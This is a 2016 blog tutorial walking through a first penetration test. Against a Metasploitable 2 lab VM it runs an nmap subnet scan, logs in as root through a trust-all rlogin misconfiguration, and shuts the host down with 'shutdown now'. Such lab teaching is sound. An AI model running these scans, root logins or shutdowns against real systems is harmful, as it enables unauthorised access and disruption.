GREP-BLOG

Monday, 6 June 2016

Your first penetration test and vulnerability exploit

Preface

As part of an Information and Technology Risk Practitioner's role, a basic grasp of penetration testing and vulnerability exploits is invaluable in order to really understand risks and associated controls particularly when it comes to the importance of vulnerability testing and countermeasures. This is the first of a series of penetration test and vulnerability exploit articles I'm planning to share that will help add some useful practical insight to the Information and Technology Risk Practitioner's toolbox.


Vulnerability

rlogin service running and misconfigured to trust all hosts and users (could have probably stopped at rlogin service is running full stop)


Background

The rlogin misconfiguration exploit is probably one of the easiest exploits available on Metasplotiable 2 Linux and as such is the first exploit we'll learn about. It is also one of the oldest and well known and is rarely seen in the wild today (but use of rlogin in untrusted environment contexts is not unheard of in recent history – rlogin was at the root of the Cisco Prime LAN Management Solution Command Execution Vulnerability in 2012 (CVE-2012-6392) - though not strictly related to this vulnerable configuration that we'll be exploring here, the CVE-2012-6392 example shows that some of these old exploits do resurface many years later).

So what is rlogin? The rlogin (remote Login) protocol definition in RFC 1282 (at https://www.ietf.org/rfc/rfc1282.txt) tells us that:

“The rlogin facility provides a remote-echoed, locally flow-controlled virtual terminal with proper flushing of output [1].  It is widely used between Unix hosts because it provides transport of more of the Unix terminal environment semantics than does the Telnet protocol, and because on many Unix hosts it can be configured not to require user entry of passwords when connections originate from trusted hosts. 
The rlogin protocol requires the use of the TCP.  The contact port is 513.  An eight-bit transparent stream is assumed.”

The rlogin protocol is includes  a number of programs two being the rlogin client “rlogin” and the rlogin server “rlogind”.

Reading through the rlogin man pages we learn that when the rlogin client sends a service request to the rlogind server, the rlogind server uses two key pieces of authentication information:
1. Whether the client's source is within the port range 512-1023; and
2. Whether the server hosts $HOME/.rhosts file allows connections from the named client and named users on that client (in the case of root access service requests that we're interested in)

If the client source port is within the range 512-1023 then we're halfway there. The $HOME/.rhosts file consists of a set of trusted network space delimited host/username value pairs that need to be set in order to allow access via rlogin. This configuration file can be set to “+ +” allowing all hosts and all users to connect to the server. In the Metasploitable 2 configuration this has deliberately been set to trust all hosts and all users,

I'm assuming you have setup a pen test environment with a Metasploitable 2 Linux target. If not please see my earlier post at http://grep-blog.blogspot.co.uk/2016/06/setting-up-basic-pen-testing.html. Start your Target (Metasploitable 2 Linux) and Attacker (Kali Linux) hosts now.


How to find and exploit the vulnerability

Finding the Vulnerability

On the Attacker host open the Terminal run the following command:

ifconfig

Check to see what your internal network IP address is configured on

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.23  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::a00:27ff:fe8f:4e85  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:8f:4e:85  txqueuelen 1000  (Ethernet)
        RX packets 246  bytes 55503 (54.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 74  bytes 5694 (5.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.151  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::a00:27ff:fe52:90bc  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:52:90:bc  txqueuelen 1000  (Ethernet)
        RX packets 2064  bytes 131413 (128.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4766  bytes 287328 (280.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 2023  bytes 85347 (83.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2023  bytes 85347 (83.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


then run a TCP SYN scan using nmap to list open ports on hosts within the 192.168.56.0/24 subnet:

nmap -sS 192.168.56.0/24

This will come back with a list of open ports on hosts within your subnet

root@kali:~# nmap -sS 192.168.56.0/24

Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-06 23:50 BST
Nmap scan report for 192.168.56.1
Host is up (0.00040s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
80/tcp   open  http
88/tcp   open  kerberos-sec
445/tcp  open  microsoft-ds
548/tcp  open  afp
3689/tcp open  rendezvous
5900/tcp open  vnc
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmap scan report for 192.168.56.2
Host is up (0.00013s latency).
All 1000 scanned ports on 192.168.56.2 are filtered
MAC Address: 08:00:27:1F:8B:E4 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.150
Host is up (0.00020s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:54:EB:B8 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.151
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.56.151 are closed

Nmap done: 256 IP addresses (4 hosts up) scanned in 17.03 seconds

You'll see the rlogin services running on ports 512, 513 and 514 of host 192.168.56.150 (the Metasploitable 2 Linux host).


Exploiting the vulnerability

You'll need the rsh-client first - get this by running the following command:

apt-get install rsh-client

Then simply run the following rlogin command:

rlogin -l root 192.168.56.150

You'll be presented with remote access to the target host's root account:

root@kali:~# rlogin -l root 192.168.56.150
Last login: Mon Jun  6 18:44:41 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# 

To test your access, shutdown the Target host with shutdown now:

root@metasploitable:~# shutdown now

Broadcast message from root@metasploitable
(/dev/pts/1) at 19:02 ...

The system is going down for maintenance NOW!
root@metasploitable:~# rlogin: connection closed.
root@kali:~# 

And there you have it! You've successfully completed your first pen test and exploit.


Note: This is for education purposes only and such activity must only be performed in your own isolated pen test environment. Never employ any of these techniques against hosts outside of your own isolated pen test environment.